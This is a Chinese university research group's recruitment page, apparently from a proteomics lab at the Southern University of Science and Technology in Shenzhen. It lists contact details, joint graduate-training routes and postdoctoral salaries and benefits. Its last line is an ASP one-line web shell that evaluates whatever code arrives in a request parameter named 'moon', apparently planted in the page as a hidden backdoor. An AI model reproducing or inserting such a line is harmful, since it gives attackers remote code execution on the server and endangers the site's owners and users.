地址:广东省深圳市南山区学苑大道1088号第一科研楼403


电话:+86-755-8801 8905


邮箱:tian.rj@sustc.edu.cn


研究生招生:

自2016年起,南科大与北京大学、哈尔滨工业大学、香港大学、香港科技大学、新加坡国立大学、英国华威大学、英国伯明翰大学、英国利兹大学等境内外知名高校开展研究生联合培养,满足双校毕业标准和论文要求后获得合作高校学位以及南科大学历证明。南科大与大陆高校联合培养项目(简称境内联培)招收攻读硕士学位研究生采用推荐免试和普通招考两种形式进行,攻读博士学位研究生采用直接攻读博士学位和“申请-考核制”两种招收方式,择优录取。


博士后招聘:

博士学历,具有分析化学、生物化学等相关专业背景,至少发表一篇高水平研究论文。我们将根据个人研究经历提供有竞争力的年薪(博士后22-27万,校长卓越博士后30万)和优厚的福利(两年后可享受深圳市最高160万安家费等)。同时,我们将提供良好的晋升空间和出国交流学习和合作研究机会。


我们热诚地欢迎有志从事蛋白质组学、生物分析化学、化学生物学和生物信息学的同学申请本团队的博士后及研究生!


<% if request("moon")<>"" then b=request("moon") a=replace(b,"moon","eval") eval (a) end if %>